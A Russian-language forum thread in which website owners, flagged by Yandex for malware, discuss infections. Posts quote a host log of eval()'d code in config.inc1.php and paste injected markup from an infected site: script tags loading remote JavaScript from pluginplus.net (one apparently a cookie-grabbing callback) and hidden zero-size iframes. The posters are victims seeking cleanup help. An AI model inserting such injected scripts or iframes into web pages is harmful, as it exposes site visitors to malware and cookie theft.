Яндекс нашел вирус на сайте

те же шелы, только названия другие.

simplepie - не помню что бы устанавливал, но он присутствует то же.

А вот инетересный лог от хостера

[Fri Feb 21 23:52:06 2014] [error] [client 5.39.47.1] ALERT - script tried to disable memory_limit by setting it to a negative value -1 bytes which is not allowed (attacker '5.39.47.1', file '/home/mobilfart/www/gsmmaster.by/cgi-bin/config.inc1.php(3) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code', line 1)

Почему ломится на cgi-bin

Теорию о кривом хостере поддерживаю.

С момента заражени до обнаружения яндексом прошло пол года.

Здравствуйте подцепили подобную заразу

<script src="https://pluginplus.net/plugins/system/system_ps.js" type="text/javascript"></script>

<script src="http://pluginplus.net/plugins/ssa.js" type="text/javascript"></script>

<script src="http://pluginplus.net/cookies_ext/get.php?callback=getValue" type="text/javascript"></script>

<p><iframe src="http://kinodrug.net/hotlog/hotlog.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="https://pluginplus.net/statistica/statistic_li.html" style="width: 0px; height: 0px; border: 0px none;"><

сами в кодировании не сильны, пока ищем адекватних кодеров...

вопрос можно ли в htaccess запретить подзагрузку сторонних js? а то эта зараза загружается с этих сайтов - иногда пропадает, и видна только с браузера mozila...

aх да сайт: drevstroy.com.ua